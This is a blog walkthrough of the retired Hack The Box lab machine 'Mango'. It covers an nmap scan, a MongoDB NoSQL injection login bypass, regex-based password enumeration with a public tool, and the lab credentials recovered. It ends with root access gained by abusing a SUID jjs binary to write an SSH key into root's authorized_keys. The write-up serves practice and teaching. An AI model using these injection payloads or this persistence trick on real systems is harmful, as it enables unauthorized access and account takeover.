Hack The Box – Mango Box Writeup By Nikhil Sahoo

Introduction

Hello everyone, I hope everyone is doing well and is safe in this current situation due to the coronavirus outbreak and hope that everyone is utilizing this time in a meaningful way 🙂 .

So, back with a new blog. Today we will go through the walkthrough of the Hack the Box machine Mango which retired very recently. It was a medium rated Linux box and wasn’t actually that difficult so it could have been placed into the easy category probably. So without further ado let’s begin…

 

 

Recon

We’ll start with our recon by doing a Nmap scan.

nmap -sC -sV 10.10.10.162

 

 

We can see port 80,443 and 22 open. So first let’s jump into our browser and view the web page.

 

We won’t find anything interesting. We could view it’s source code as well and run a directory bruteforce over it but again it won’t give us anything special.

Now if we view the HTTPS certificate information, we can see that the certificate is issued to staging-order.mango.htb. This information was also available in our nmap scan but we somehow missed it.

 

Now let’s add this information to our hosts file and associate it with the machine’s IP address 10.10.10.162.

We will be adding the below line to our hosts file present inside /etc.

10.10.10.162     staging-order.mango.htb

 

Now if we navigate to staging-order.mango.htb, we will be presented with a login page.

We could try all possible bypasses using SQL queries however it won’t break.

The Backend DB was MongoDB so probably that’s why the name of the box was Mango itself and if that’s the case we could try for NOSQL injection as well.

Let’s open our burp and capture our login request.

Once we capture it, we could try a simple technique to bypass the login page by using the following parameters:

username[$ne]=anything&password[$ne]=anything

 

This basically specifies that the username and our password is not equal to($ne) “anything”, which basically is a true statement and therefore we were able to bypass the login page.

 

Nothing interesting here as well. Apart from bypassing login page we could have also enumerated credentials by using regex.

username[$ne]=toto&password[$regex]=.{17}&login=login

 

As you could see this does not redirect us to home.php

username[$ne]=toto&password[$regex]=.{16}&login=login

But here it gives us a redirect, so we are sure that the length of the first password in db is 16 characters long.

You could then go on to enumerate all passwords and usernames similarly by using the regex like below:

username[$ne]=toto&password[$regex]=a.{15}&login=login

This means that the username is not equal to “toto” and the password starts with “a” and there are 15 characters after “a”. If this gives us a redirect to home.php then we can assure that the first character of the password is a. We have to enumerate all users and passwords in a similar way. Very tedious right?

Well there are multiple tools available for this that would automate the whole process.

Here is the link of an awesome enumeration tool that I used:

https://github.com/an0nlk/Nosql-MongoDB-injection-username-password-enumeration

First let’s enumerate all usernames.

python nosqli-user-pass-enum.py -u http://staging-order.mango.htb/ -up username -pp password -op login:login -ep username -m POST

where up is the username parameter name, pp is for password parameter name, op is for specifying any other parameters that are flowing in the request and ep specifies the parameter that we would like to enumerate.

 

So we got two usernames: admin and mango

Now moving onto passwords, simply replace the ep parameter with the password parameter.

 

We got the following passwords: h3mXK8RhU~f{]f5H associated with mango user and t9KcS3>!0B#2 associated with admin user

Since we had port 22 open, let’s try to login using these credentials.

 

And we are in. Let’s try to fetch the user flag.

 

No permissions, so probably the admin user only has the permissions.

Let’s try to login using the admin creds.

 

Not able to login via SSH 🙁

Let’s try to escalate to admin user from the mango user shell using the su command.

 

And we should be getting our user flag.

 

Privilege Escalation

We will be running LinEnum.sh script in order to find any potential escalation methods. We can download it very easily from our own local machine by hosting it using the python http server.

bash LinEnum.sh

 

So we got an interesting output specifying that jjs is set with the suid bit i.e it will be running as root.

“If you wonder what jjs stands for, it stands for Java JavaScript. The command is located in the JDK_HOME\bin directory. The command can be used to run scripts in files or scripts entered on the command-line in interactive mode. It can also be used to execute shell scripts.”

Let’s jump over to gtfobins to check for any possible escalation methods.

 

As mentioned we could try for multiple methods specified to spawn a root shell, however it didn’t work for me.

We could try to fetch the root flag directly by using the commands required to read a file specified above.

Or what we could do is we can insert our local machine SSH public key to the machine’s authrorized_keys file present inside .ssh directory inside root so that when we try to ssh as root we will be able to login without any password.

This can be achieved using the File write commands specified above in GTFObins. We just have to replace the file location to “/root/.ssh/authorized_keys” and the DATA field to our own ssh public key.

 

All set. Now let’s try to login as root.

 

We are in 🙂

Time for getting the root flag.

 

So we got our root flag 🙂 … That explains it all.

So that’s for now. See you next time.

Till then Stay Safe, Stay Home

Happy Hacking !!!

 

You can have a look at my previous article on Hack The Box: Traverxec Box Walkthrough. Here is the link of the article

Loved what you read?

If so, then kindly comment, follow and share our website for much more interesting stuff  ?

For any queries you can send a Hi to my Linkedin Handle: Here

 

You may also like...

Leave a Reply

Your email address will not be published. Required fields are marked *